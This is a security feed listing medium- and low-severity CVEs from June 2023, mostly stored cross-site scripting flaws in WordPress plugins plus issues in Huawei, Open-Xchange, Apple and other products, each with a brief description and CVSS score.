2023-06-19 CVE-2023-0368 Responsive Tabs FOR Wpbakery Page Builder Project Cross-site Scripting vulnerability in Responsive Tabs for Wpbakery Page Builder Project Responsive Tabs for Wpbakery Page Builder

The Responsive Tabs For WPBakery Page Builder (formerly Visual Composer) WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

5.4
2023-06-19 CVE-2023-0489 Slideonline Project Unspecified vulnerability in Slideonline Project Sideonline

The SlideOnline WordPress plugin through 1.2.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

5.4
2023-06-19 CVE-2023-2899 WEB Argument Unspecified vulnerability in Web-Argument Google MAP Shortcode

The Google Map Shortcode WordPress plugin through 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin

5.4
2023-06-22 CVE-2023-2991 Globalscape Unspecified vulnerability in Globalscape EFT Server

Fortra Globalscape EFT's administration server suffers from an information disclosure vulnerability where the serial number of the harddrive that Globalscape is installed on can be remotely determined via a "trial extension request" message

5.3
2023-06-20 CVE-2023-26429 Open Xchange Command Injection vulnerability in Open-Xchange Appsuite Backend

Control characters were not removed when exporting user feedback content.

5.3
2023-06-19 CVE-2022-48488 Huawei Incorrect Authorization vulnerability in Huawei Emui

Vulnerability of bypassing the default desktop security controls.Successful exploitation of this vulnerability may cause unauthorized modifications to the desktop.

5.3
2023-06-19 CVE-2022-48491 Huawei Missing Authorization vulnerability in Huawei Emui

Vulnerability of missing authentication on certain HUAWEI phones.Successful exploitation of this vulnerability can lead to ads and other windows to display at any time.

5.3
2023-06-19 CVE-2022-48495 Huawei Incorrect Authorization vulnerability in Huawei Emui 12.0.0/12.0.1/13.0.0

Vulnerability of unauthorized access to foreground app information.Successful exploitation of this vulnerability may cause foreground app information to be obtained.

5.3
2023-06-19 CVE-2023-34156 Huawei Unspecified vulnerability in Huawei Emui

Vulnerability of services denied by early fingerprint APIs on HarmonyOS products.Successful exploitation of this vulnerability may cause services to be denied.

5.3
2023-06-19 CVE-2023-34158 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui 12.0.0/13.0.0

Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

5.3
2023-06-19 CVE-2023-34160 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui 12.0.0/13.0.0

Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

5.3
2023-06-19 CVE-2023-34167 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui

Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

5.3
2023-06-19 CVE-2023-2751 Upload Resume Project Unspecified vulnerability in Upload Resume Project Upload Resume

The Upload Resume WordPress plugin through 1.2.0 does not validate the captcha parameter when uploading a resume via the resume_upload_form shortcode, allowing unauthenticated visitors to upload arbitrary media files to the site.

5.3
2023-06-19 CVE-2023-32208 Mozilla Unspecified vulnerability in Mozilla Firefox

Service workers could reveal script base URL due to dynamic `import()`.

5.3
2023-06-23 CVE-2023-35163 Gobalsky Improper Input Validation vulnerability in Gobalsky Vega

Vega is a decentralized trading platform that allows pseudo-anonymous trading of derivatives on a blockchain.

5.2
2023-06-20 CVE-2023-26435 Open Xchange Server-Side Request Forgery (SSRF) vulnerability in Open-Xchange Appsuite Backend

It was possible to call filesystem and network references using the local LibreOffice instance using manipulated ODT documents.

5.0
2023-06-23 CVE-2023-35157 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

4.8
2023-06-23 CVE-2023-27427 Ntzapps Cross-site Scripting vulnerability in Ntzapps CRM Memberships

Auth.

4.8
2023-06-23 CVE-2023-28751 Wpmet Cross-site Scripting vulnerability in Wpmet WP Ultimate Review 2.0.3

Auth.

4.8
2023-06-23 CVE-2023-32580 Wpexperts Cross-site Scripting vulnerability in Wpexperts Password Protected

Auth.

4.8
2023-06-23 CVE-2023-35048 Magepeople Cross-site Scripting vulnerability in Magepeople Booking & Rental Manager

Auth.

4.8
2023-06-22 CVE-2023-30347 STL Cross-site Scripting vulnerability in STL Neox Dial Centre 2.3.9

Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search.

4.8
2023-06-22 CVE-2023-34170 Wpovernight Cross-site Scripting vulnerability in Wpovernight Download Quick/Bulk Order Form for Woocommerce

Auth.

4.8
2023-06-22 CVE-2023-28774 Grade Cross-site Scripting vulnerability in Grade Review Stream

Auth.

4.8
2023-06-22 CVE-2023-33323 Reputeinfosystems Cross-site Scripting vulnerability in Reputeinfosystems Armember

Auth.

4.8
2023-06-22 CVE-2023-34006 Telegram BOT Channel Project Cross-site Scripting vulnerability in Telegram BOT & Channel Project Telegram BOT & Channel

Auth.

4.8
2023-06-22 CVE-2023-34368 Kanbanwp Cross-site Scripting vulnerability in Kanbanwp Kanban Boards

Auth.

4.8
2023-06-22 CVE-2023-23807 Qumos Cross-site Scripting vulnerability in Qumos Mojoplug Slide Panel

Auth.

4.8
2023-06-22 CVE-2023-23811 Smoothscroller Project Cross-site Scripting vulnerability in Smoothscroller Project Smoothscroller

Auth.

4.8
2023-06-22 CVE-2023-26534 Onewebsite Cross-site Scripting vulnerability in Onewebsite WP Repost

Auth.

4.8
2023-06-22 CVE-2023-26539 Advanced Text Widget Project Cross-site Scripting vulnerability in Advanced Text Widget Project Advanced Text Widget

Auth.

4.8
2023-06-22 CVE-2023-27452 WOW Estore Cross-site Scripting vulnerability in Wow-Estore Button Generator - Easily Button Builder

Auth.

4.8
2023-06-22 CVE-2023-28174 Elightup Cross-site Scripting vulnerability in Elightup Erocket

Auth.

4.8
2023-06-22 CVE-2023-28778 Bestwebsoft Cross-site Scripting vulnerability in Bestwebsoft Pagination

Auth.

4.8
2023-06-22 CVE-2023-29707 Gbcom Cross-site Scripting vulnerability in Gbcom LAC web Control Center Lac1.3.X

Cross Site Scripting (XSS) vulnerability in GBCOM LAC WEB Control Center version lac-1.3.x, allows attackers to create an arbitrary device.

4.8
2023-06-22 CVE-2023-27618 Agilelogix Cross-site Scripting vulnerability in Agilelogix Store Locator

Auth.

4.8
2023-06-22 CVE-2023-28423 Prismtechstudios Cross-site Scripting vulnerability in Prismtechstudios Modern Footnotes

Auth.

4.8
2023-06-22 CVE-2023-28496 Smtp2Go Cross-site Scripting vulnerability in Smtp2Go

Auth.

4.8
2023-06-22 CVE-2023-28695 Vigilantor Project Cross-site Scripting vulnerability in Vigilantor Project Vigilantor

Auth.

4.8
2023-06-21 CVE-2023-27429 Automattic Cross-site Scripting vulnerability in Automattic Jetpack CRM

Auth.

4.8
2023-06-21 CVE-2023-27439 NEW Adman Project Cross-site Scripting vulnerability in NEW Adman Project NEW Adman 1.6.7.2/1.6.8

Auth.

4.8
2023-06-20 CVE-2020-20697 Nodcms Cross-site Scripting vulnerability in Nodcms 3.0

Cross Site Scripting vulnerability in khodakhah NodCMS v.3.0 allows a remote attacker to execute arbitrary code and gain access to senstivie information via a crafted script to the address parameter.

4.8
2023-06-20 CVE-2023-35095 Flothemes Cross-site Scripting vulnerability in Flothemes FLO Forms

Auth.

4.8
2023-06-20 CVE-2023-35878 Extra User Details Project Cross-site Scripting vulnerability in Extra User Details Project Extra User Details

Auth.

4.8
2023-06-19 CVE-2023-35779 Seedwebs Cross-site Scripting vulnerability in Seedwebs Seed Fonts

Auth.

4.8
2023-06-19 CVE-2023-33213 Gvectors Cross-site Scripting vulnerability in Gvectors Wpview

Auth.

4.8
2023-06-19 CVE-2023-2401 Qudata Unspecified vulnerability in Qudata Qubot

The QuBot WordPress plugin before 1.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

4.8
2023-06-19 CVE-2023-2527 Crmperks Cross-site Scripting vulnerability in Crmperks Integration for Contact Form 7 and Zoho Crm, Bigin 1.2.2

The Integration for Contact Form 7 and Zoho CRM, Bigin WordPress plugin before 1.2.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

4.8
2023-06-19 CVE-2023-2600 Artprojectgroup Unspecified vulnerability in Artprojectgroup Custom Base Terms

The Custom Base Terms WordPress plugin before 1.0.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-06-19 CVE-2023-2684 Wpfactory Unspecified vulnerability in Wpfactory File Renaming on Upload

The File Renaming on Upload WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-06-19 CVE-2023-2742 Quantumcloud Unspecified vulnerability in Quantumcloud AI Chatbot

The AI ChatBot WordPress plugin before 4.5.5 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

4.8
2023-06-19 CVE-2023-2811 Quantumcloud Unspecified vulnerability in Quantumcloud AI Chatbot

The AI ChatBot WordPress plugin before 4.5.6 does not sanitise and escape numerous of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks to all admin when setting chatbot and all client when using chatbot

4.8
2023-06-19 CVE-2023-2812 Ultimate Dashboard Project Unspecified vulnerability in Ultimate Dashboard Project Ultimate Dashboard

The Ultimate Dashboard WordPress plugin before 3.7.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-06-19 CVE-2023-34657 Eyoucms Cross-site Scripting vulnerability in Eyoucms 1.6.2

A stored cross-site scripting (XSS) vulnerability in Eyoucms v1.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the web_recordnum parameter.

4.8
2023-06-23 CVE-2023-32391 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved checks.

4.6
2023-06-23 CVE-2023-28064 Dell Out-of-bounds Write vulnerability in Dell products

Dell BIOS contains an Out-of-bounds Write vulnerability.

4.6
2023-06-23 CVE-2023-3212 Linux
Fedoraproject
Redhat
Debian
Netapp
NULL Pointer Dereference vulnerability in multiple products

A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel.

4.4
2023-06-23 CVE-2023-35931 Shescape Project Information Exposure Through Environmental Variables vulnerability in Shescape Project Shescape

Shescape is a simple shell escape library for JavaScript.

4.3
2023-06-23 CVE-2022-42807 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

4.3
2023-06-23 CVE-2023-34466 Xwiki Information Exposure vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

4.3
2023-06-22 CVE-2023-25500 Vaadin Information Exposure vulnerability in Vaadin

Possible information disclosure in Vaadin 10.0.0 to 10.0.23, 11.0.0 to 14.10.1, 15.0.0 to 22.0.28, 23.0.0 to 23.3.13, 24.0.0 to 24.0.6, 24.1.0.alpha1 to 24.1.0.rc2, resulting in potential information disclosure of class and method names in RPC responses by sending modified requests.

4.3
2023-06-20 CVE-2023-26431 Open Xchange Server-Side Request Forgery (SSRF) vulnerability in Open-Xchange Appsuite Backend

IPv4-mapped IPv6 addresses did not get recognized as "local" by the code and a connection attempt is made.

4.3
2023-06-20 CVE-2023-26432 Open Xchange Unspecified vulnerability in Open-Xchange Appsuite Backend

When adding an external mail account, processing of SMTP "capabilities" responses are not limited to plausible sizes.

4.3
2023-06-20 CVE-2023-26433 Open Xchange Unspecified vulnerability in Open-Xchange Appsuite Backend

When adding an external mail account, processing of IMAP "capabilities" responses are not limited to plausible sizes.

4.3
2023-06-20 CVE-2023-26434 Open Xchange Unspecified vulnerability in Open-Xchange Appsuite Backend

When adding an external mail account, processing of POP3 "capabilities" responses are not limited to plausible sizes.

4.3
2023-06-19 CVE-2023-3315 Jenkins Missing Authorization vulnerability in Jenkins Team Concert

Missing permission checks in Jenkins Team Concert Plugin 2.4.1 and earlier allow attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.

4.3

14 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-23 CVE-2023-3303 Admidio Improper Access Control vulnerability in Admidio

Improper Access Control in GitHub repository admidio/admidio prior to 4.2.9.

3.5
2023-06-21 CVE-2023-0969 Silabs Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Silabs Z/Ip Gateway SDK

A vulnerability in SiLabs Z/IP Gateway 7.18.01 and earlier allows an authenticated attacker within Z-Wave range to manipulate an array pointer to disclose the contents of global memory.

3.5
2023-06-23 CVE-2022-42834 Apple Unspecified vulnerability in Apple Macos

An access issue was addressed with improved access restrictions.

3.3
2023-06-23 CVE-2023-32386 Apple Unspecified vulnerability in Apple Macos

A privacy issue was addressed with improved handling of temporary files.

3.3
2023-06-23 CVE-2023-32464 Dell Improper Certificate Validation vulnerability in Dell products

Dell VxRail, versions prior to 7.0.450, contain an improper certificate validation vulnerability.

3.3
2023-06-20 CVE-2023-26427 Open Xchange Incorrect Permission Assignment for Critical Resource vulnerability in Open-Xchange Appsuite Backend

Default permissions for a properties file were too permissive.

3.3
2023-06-19 CVE-2023-34414 Mozilla Improper Certificate Validation vulnerability in Mozilla Firefox

The error page for sites with invalid TLS certificates was missing the activation-delay Firefox uses to protect prompts and permission dialogs from attacks that exploit human response time delays.

3.1
2023-06-22 CVE-2023-34110 Flask Appbuilder Project Information Exposure Through an Error Message vulnerability in Flask-Appbuilder Project Flask-Appbuilder

Flask-AppBuilder is an application development framework, built on top of Flask.

2.7
2023-06-20 CVE-2023-2400 Devolutions Incomplete Cleanup vulnerability in Devolutions Server

Improper deletion of resource in the user management feature in Devolutions Server 2023.1.8 and earlier allows an administrator to view users vaults of deleted users via database access.

2.7
2023-06-23 CVE-2023-32365 Apple Unspecified vulnerability in Apple Ipados and Iphone OS

The issue was addressed with improved checks.

2.4
2023-06-23 CVE-2023-32390 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved checks.

2.4
2023-06-23 CVE-2023-32394 Apple Exposure of Resource to Wrong Sphere vulnerability in Apple products

The issue was addressed with improved checks.

2.4
2023-06-23 CVE-2023-32417 Apple Unspecified vulnerability in Apple Watchos

This issue was addressed by restricting options offered on a locked device.

2.4
2023-06-19 CVE-2022-48506 Dominionvoting Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Dominionvoting Democracy Suite

A flawed pseudorandom number generator in Dominion Voting Systems ImageCast Precinct (ICP and ICP2) and ImageCast Evolution (ICE) scanners allows anyone to determine the order in which ballots were cast from public ballot-level data, allowing deanonymization of voted ballots, in several types of scenarios.

2.4